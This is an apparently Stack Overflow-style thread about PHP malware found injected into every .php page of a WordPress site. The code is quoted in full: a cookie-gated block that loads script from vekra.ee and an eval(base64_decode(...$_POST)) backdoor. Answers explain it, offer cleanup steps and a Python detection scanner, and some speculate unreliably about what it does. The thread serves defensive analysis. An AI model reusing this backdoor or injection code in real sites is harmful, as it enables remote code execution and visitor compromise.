
What will this PHP script do? Is it malicious PHP code?

Can someone please advise what this PHP code will do? I have found this code in every .php page, but only there. Other files like js / css / php.ini are fine. Is this malicious code? If yes, please suggest how to prevent the malicious activity.

Here is the Code:

global $sessdt_o;
if(!$sessdt_o) { 
    $sessdt_o = 1; 
    $sessdt_k = "lb11"; 
    if(!@$_COOKIE[$sessdt_k]) { 
        $sessdt_f = "102"; 
        if(!@headers_sent()) { 
            @setcookie($sessdt_k,$sessdt_f); 
        } else { 
            echo "<script>document.cookie='".$sessdt_k."=".$sessdt_f."';</script>"; 
        } 
    } else { 
        if($_COOKIE[$sessdt_k]=="102") { 
            $sessdt_f = (rand(1000,9000)+1); 
            if(!@headers_sent()) { 
                @setcookie($sessdt_k,$sessdt_f); 
            } else { 
                echo "<script>document.cookie='".$sessdt_k."=".$sessdt_f."';</script>"; 
            } 
            $sessdt_j = @$_SERVER["HTTP_HOST"].@$_SERVER["REQUEST_URI"]; 
            $sessdt_v = urlencode(strrev($sessdt_j)); 
            $sessdt_u = "http://vekra.ee/?rnd=".$sessdt_f.substr($sessdt_v,-200); 
            echo "<script src='$sessdt_u'></script>"; 
            echo "<meta http-equiv='refresh' content='0;url=http://$sessdt_j'><!--"; 
        } 
    } 
    $sessdt_p = "showimg"; 
    if(isset($_POST[$sessdt_p])){ 
        eval(base64_decode(str_replace(chr(32),chr(43),$_POST[$sessdt_p])));
        exit;
    }
}

It's more likely that it will redirect every page of yours to the attacker's website. The @ will halt any errors, so you won't get any logs from this script.

You should remove it if you want your site to work properly.

EDIT: it doesn't redirect, but it will inject anything it wants into your pages. The second part of the script, where it checks for cookies, will add JavaScript from his website and can do malicious things.

As for the last part, I don't think anyone will be able to guess what it is, because it relies on a POST variable, $_POST['showimg']; I guess he attacked your website with POST.

Things to do: change your passwords; check the write permissions on your files (they shouldn't be 0777); back up the database and WordPress template; delete the WordPress install and re-install from scratch. In your template, search for his code, then add your cleaned template.
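For the "search for his code" step, here is an added example (not from the question or any answer) of a small scanner that walks the install and flags the indicators visible in the quoted snippet: the $sessdt_ variable prefix, the vekra.ee loader host, and the eval(base64_decode(str_replace(chr(32),chr(43),$_POST[...]))) sink. The sample file contents below are constructed for the demonstration, not taken from the questioner's site.

```python
import re
from pathlib import Path

# Indicators taken from the injected snippet quoted in the question.
# Each maps a short name to a regex matched line by line over file text.
INDICATORS = {
    # variable prefix used throughout the injected block
    "sessdt_vars": re.compile(r"\$sessdt_[a-z]\b"),
    # host the injected <script src=...> is loaded from
    "remote_loader": re.compile(r"vekra\.ee"),
    # the backdoor: eval() of a base64 payload taken from $_POST; the
    # str_replace(chr(32),chr(43),...) restores '+' lost in form decoding
    "post_eval_sink": re.compile(
        r"eval\s*\(\s*base64_decode\s*\(\s*str_replace\s*\("
        r"\s*chr\(32\)\s*,\s*chr\(43\)\s*,\s*\$_POST"
    ),
    # looser catch-all for other eval-of-POST-data variants
    "eval_of_post": re.compile(r"eval\s*\(.*\$_POST\s*\["),
}


def scan_text(text: str) -> list[tuple[str, int]]:
    """Return (indicator, line_number) pairs found in PHP source text."""
    hits = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        for name, pattern in INDICATORS.items():
            if pattern.search(line):
                hits.append((name, lineno))
    return hits


def scan_tree(root: Path) -> dict[str, list[tuple[str, int]]]:
    """Scan every .php file under root (the question says only .php files were touched)."""
    report = {}
    for path in sorted(root.rglob("*.php")):
        hits = scan_text(path.read_text(encoding="utf-8", errors="replace"))
        if hits:
            report[str(path)] = hits
    return report


# Constructed sample: a fragment of the injected block prepended to a page.
INFECTED_SAMPLE = """<?php
global $sessdt_o;
if(!$sessdt_o) {
    $sessdt_u = "http://vekra.ee/?rnd=".$sessdt_f.substr($sessdt_v,-200);
    if(isset($_POST[$sessdt_p])){
        eval(base64_decode(str_replace(chr(32),chr(43),$_POST[$sessdt_p])));
    }
}
?>
<?php echo "hello"; ?>
"""
# Constructed clean sample: base64_decode alone is not a hit.
CLEAN_SAMPLE = "<?php\necho base64_decode('aGVsbG8=');\n"

if __name__ == "__main__":
    for name, lineno in scan_text(INFECTED_SAMPLE):
        print(f"line {lineno}: {name}")
```

Run scan_tree(Path("/path/to/wordpress")) against the real install; every file it reports needs the injected block removed or the file replaced from a known-good copy.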

I haven't examined it closely, but only the line

eval(base64_decode(str_replace(chr(32),chr(43),$_POST[$sessdt_p])));

shows me already that it is, if not malicious, then very, very close: code injection is possible.

Your problem is not the code itself, it's how it got there in the first place. You need to check the write permissions on your files/folders to make sure no one from the outside can modify them.

You mentioned that you're using WordPress; please read this article about hardening WordPress security. I suggest that you lock down your blog (if it's feasible) until you fix your security issues.

I'm a security analyst and I believe it is redirecting you to a possibly malicious website if and only if you do not have that cookie. If you already have that cookie, then the script will know you have already been there and are possibly researching the malware, thus not executing the redirect. The image may be like a detect-debugger preset API. This is just my opinion.
